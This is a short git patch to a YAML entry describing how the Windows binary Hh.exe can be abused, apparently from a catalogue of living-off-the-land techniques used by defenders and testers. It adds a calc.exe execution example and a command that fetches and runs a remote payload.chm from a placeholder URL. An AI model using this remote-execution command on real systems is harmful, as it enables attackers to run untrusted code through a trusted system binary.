From b46fc3f8c242a44d5d0f3e65e81aaad1cda3a8fa Mon Sep 17 00:00:00 2001 From: Wietze Date: Wed, 20 Nov 2024 23:24:00 +0000 Subject: [PATCH] Fixing issue with hh.yml --- yml/OSBinaries/Hh.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index fd09acc..27af482 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -14,6 +14,8 @@ Commands: Tags: - Execute: EXE - Application: GUI + - Command: HH.exe c:\windows\system32\calc.exe + Description: Executes calc.exe with HTML Help. Usecase: Execute process with HH.exe Category: Execute Privileges: User @@ -22,6 +24,7 @@ Commands: Tags: - Execute: EXE - Application: GUI + - Command: HH.exe http://some.url/payload.chm Description: Executes a remote payload.chm file which can contain commands. Usecase: Execute commands with HH.exe Category: Execute